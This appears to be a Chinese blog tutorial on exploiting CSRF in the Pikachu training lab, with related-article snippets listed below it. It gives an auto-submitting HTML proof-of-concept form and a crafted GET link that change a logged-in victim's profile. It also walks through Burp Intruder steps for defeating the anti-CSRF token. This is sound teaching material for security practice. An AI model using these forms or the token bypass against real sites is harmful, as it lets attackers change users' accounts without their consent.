CSRF攻击实例-Pikachu

已于 2024-01-23 10:40:25 修改
阅读量426 收藏 8
点赞数 6
分类专栏: # 其他常见漏洞类型 文章标签: csrf 网络 前端 安全
于 2024-01-20 11:04:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62715196/article/details/135712447
版权

文章目录

pikachu

get

方法

正常用户登录后,修改信息时会向后端发送请求包,抓到此请求包,然后构造恶意链接发给受害者点击

恶意链接

构造 html 页面、然后让被攻击者访问此页面

<html>
<!--CSRF PoC-generated by Burp Suite Professional -->
<body>
 <form  action="http://192.168.65.128/pikachu/vul/csrf/csrfget/csrf_get_edit.php">
<input type="hidden" name="sex" value="girl"/>
<input type="hidden" name="phonenum" value="15911111111" />
<input type="hidden" name="add" value="nba&#32;lakes"/><input type="hidden" name="email" value="hack&#64; pikachu&#46;com"/>
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit request" />
 </form>
 <script>
history.pushstate(". ", '/');
document.forms[0].submit();
</script>
</body>
</html>
将修改页面抓包

在这里插入图片描述

生成poc

在这里插入图片描述

复制POC

在这里插入图片描述
由于是 CET 请求,所以也可以直接发送修改信息的链接给被攻击者访问

http://192.168.65.128/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=15933333333&add=nba+akes&email=hack%40pikachu.com&submit=submit

post

方法

正常用户登录后,修改信息时会向后端发送请求包,抓到此请求包,然后构造恶意链接发给受害者点击
流程同get方法

Token

将数据包发送到 Intruder 模块

在这里插入图片描述

攻击模式选择 Pitchfork

将需要修改的信息和 token 设置为可变量

在这里插入图片描述

设置信息的 payload,正常设置即可

设置 token 的 payload

Options->Grep-Extract

点击 Add
在这里插入图片描述
点击 Refetch response
在这里插入图片描述
双击 value 后的值,并复制下来
在这里插入图片描述
勾选 Update config based on selectionbelow(默认)
在这里插入图片描述
点击 OK

Options->Redirections

选择always
在这里插入图片描述

payload2 选择 Recursive grep

将前面复制的 token 填入输入框,勾选 Stop ifduplicate payload found
在这里插入图片描述

创建单线程

在这里插入图片描述

开始攻击
摆烂鱼
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSRF-Protector-PHP:CSRF保护器库
05-10
" owasp/csrf-protector-php " : " dev-master " } } 然后打开终端(或命令提示符),移至项目目录并运行 composer install # # Or alternatively php composer.phar install 这会将CSRFP添加到您的项目目录中...
CSRF攻击-pikachu靶场
qq_43936524的博客
10-10 466
文章目录CSRF概念CSRF原理pikachu实例防范措施 CSRF概念 Cross-Site request forgrey简称CSRF,在CSRF攻击场景中攻击者会伪造一个请求,这个请求一般是链接,用户点击以后整个攻击也就完成了,故CSRF也被称为one click攻击。本质是攻击者盗用了目标用户的身份,以这个身份发送请求。 CSRF原理 举例: 用户C登录A网站进行购物,攻击者B想把用户A购物的收货地址改为自己的地址,那么攻击者B则需要1.用户C的登录权限 2.向服务器发送更改地址的请求。 攻击者B
CSRF跨站请求伪造攻击(附自动化工具实战某CMS)
m0_51468027的博客
02-02 2838
一、CSRF介绍   CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像xss漏洞,但是它与xss漏洞非常不同。xss利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。与xss攻击相比,csrf攻击往往不大流行,也难以防范,所以认为比xss漏洞更具危险性 二、CSRF漏洞原理   CS
w28pikachu-csrf实例
三旬的博客
02-17 360
点击"pikachu-csrf-post"文字后,跳转到pikachucsrf(post)界面,展示修改后的界面。点击"pikachu-csrf-get"文字后,跳转到pikachucsrf(get)界面,展示修改后的界面。点击"pikachu-csrf-token"文字后,在控制台中查看newurl,并复制下来输入到浏览器中。刷新csrf token,展示了修改后的信息。这里需要同时修改性别、手机、住址、邮箱。这里post请求,需要通过表单提交。这里get请求+token。
pikachu-csrf,结合存储型xss的利用
weixin_43995159的博客
02-11 236
pikachu靶场的三道csrf题目,给出了一些结合存储型xss绕过token检测的思路
18-csrf漏洞及ssrf漏洞
qq_56414082的博客
03-27 461
跨站请求攻击,简单地说,在CSRF攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。比如: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。
CSRF和SSRF漏洞案例讲解
weixin_46739058的博客
04-09 3259
CSRF的概念 CSRF:跨站请求伪造(Cross-site request forgery)CSRF是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。当用户访问含有恶意代码的网页时,会向指定正常网站发送非本人意愿的数据请求包(如转账给hack,向hack发送API等)如果此时用户恰好登录了该正常网站(也就是身份验证是正常的)就会执行该恶意代码的请求,从而造成CSRF。 与在XSS章节中提到的在博客里写入获取cookie的代码,在管理员登录后台查看时就会窃取其cookie有异曲..
29.CSRF及SSRF漏洞案例讲解
mingyqf的博客
12-30 2727
CSRF&SSRF】—漏洞案例讲解—day29 一、CSRF—跨站请求伪造攻击 1、解释 CSRF漏洞解释,原理 CSRF(Cross-site request forgery) 跨站请求伪造,由客户端发起,是一种劫持受信任用户向服务器发送非预期请求的攻击方式,与XSS相似,但比XSS更难防范,常与XSS一起配合攻击 原理详解 攻击者盗用了你的身份信息,以你的名义发送恶意请求,对服务器来说这个请求是你发起的,却完成了攻击者所期望的一个操作 XSS 利用站点内内的信任用户,盗取cookie CS
【xss结合csrf实验】
一纸荒芜的博客
09-07 1737
通常xss漏洞可以和csrf漏洞结合使用,今天就做一个小的实验举例,漏洞主要利用的是用户修改敏感信息的未退出状态,并且修改信息不需要验证时很容易被伪造,当我们发现存在csrf漏洞时,可构造url请求信息,配合xss漏洞去配合诱导访问。本实验由本地搭建的pikachu靶场做演示。 本期简单介绍了xss漏洞与csrf漏洞的配合使用。
【渗透测试】浅谈 CSRF
qq_48201589的博客
08-30 521
CSRF(Cross Site Request Forgery),中文翻译过来叫跨站请求伪造。是一种常见的Web漏洞。曾在2007年被列为互联网20大安全隐患之一。黑客可以构造一个恶意请求,而用户又点击了此精心构造的payload,导致用户的个人隐私以及财产安全造成威胁。因为此类漏洞需要用户点击,所以也称该漏洞为“One-Click Attack”。所以,对于突然发来的邮件以及陌生美女发来的“点击有惊喜”此类的链接以及二维码,我们点击时还是要慎重。......
Bolt:CSRF扫描仪-源码
05-25
比较中此阶段专注于重播攻击场景的检测,因此检查令牌是否已发行多次。 它还计算所有令牌之间的平均,以查看它们是否相似。 还将令牌与250多种哈希模式的数据库进行比较。观察在此阶段,对单个网页同时发出100个请求...
CSrf攻击-苏醒的巨人
09-16
CSrf攻击-苏醒的巨人
CSRF:ring-csrf示例
01-28
CSRF:ring-csrf示例
安全性测试--CSRF攻击
02-26
你这可以这么理解CSRF攻击攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于**商品,虚拟货币转账......造成的问题包括:个人隐私泄露以及...
CSRF 攻击实验:无防御措施的 CSRF 漏洞
Flag少侠的博客
05-14 1463
CSRF(Cross-Site Request Forgery),也称为XSRF,是一种安全漏洞,攻击者通过欺骗用户在受信任网站上执行非自愿的操作,以实现未经授权的请求。CSRF攻击利用了网站对用户提交的请求缺乏充分验证和防范的弱点。攻击者通常通过在受信任网站上构造恶意的请求链接或提交表单,然后诱使用户点击该链接或访问包含恶意表单的页面。当用户执行了这些操作时,网站会自动发送请求,包含用户的身份验证信息,而用户并不知情。在这个示例中,攻击者可能在自己的网站上构造一个页面,包含上述代码。
CSRF 攻击
最新发布
wanglf_clog的博客
05-21 298
CSRF(Cross-Site Request Forgery,跨站请求伪造)攻击,是一种常见的网络攻击方式,它利用用户在已登录网站的凭证(如 Cookie、Session 等)向第三方网站发送非授权的请求。这种攻击之所以有效,是因为浏览器会自动携带用户在 A 网站的认证信息去访问 B 网站,如果 B 网站没有做好防护措施,就会误以为该请求是用户主动发起的并予以执行,从而可能执行恶意操作,如修改用户数据、进行非法转账等。
使用MPLS解决BGP的路由黑洞(详解)
qq_64302290的博客
05-18 232
我们知道在MPLS中数据的转发不再依靠路由表而是靠标签(注意:标签是在路由的基础上形成的)。所以在BGP中,我们依靠的就是这个特性来解决BGP的路由黑洞。BGP路由黑洞的解释:BGP的路由黑洞其实就是路由层面可达,数据层面不可达。(你可以收到对方的路由,但是不能和对方通讯。
Linux网络编程:网络基础
weixin_73234157的博客
05-20 561
当我们形成计算机网络后,小明要给他的暗恋对象小红发一句“我喜欢你”,结果发给了小芳……,在计算机网络中会出现许许多多的主机,当我们进行网络通信时,我们要通过协议来找到指定的接收方。同理在单台主机中,数据从键盘中读入再转载到当前网卡也是需要协议的。简单来说:协议就是一种约定当计算机在读取数据时,发现数据中存在向网卡输送的标志(协议)时,就往网卡输送。当网卡读取到输送给小红,网卡就不会发送给小芳。
CSRF 攻击 攻击原理
06-11
CSRF(Cross-Site Request Forgery)攻击又称为跨站请求伪造或者被动式攻击攻击者通过伪造合法用户的请求发送到Web应用程序,从而达到不正当的目的。攻击者通常需要诱导用户执行某些操作(如点击链接、访问网站等...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值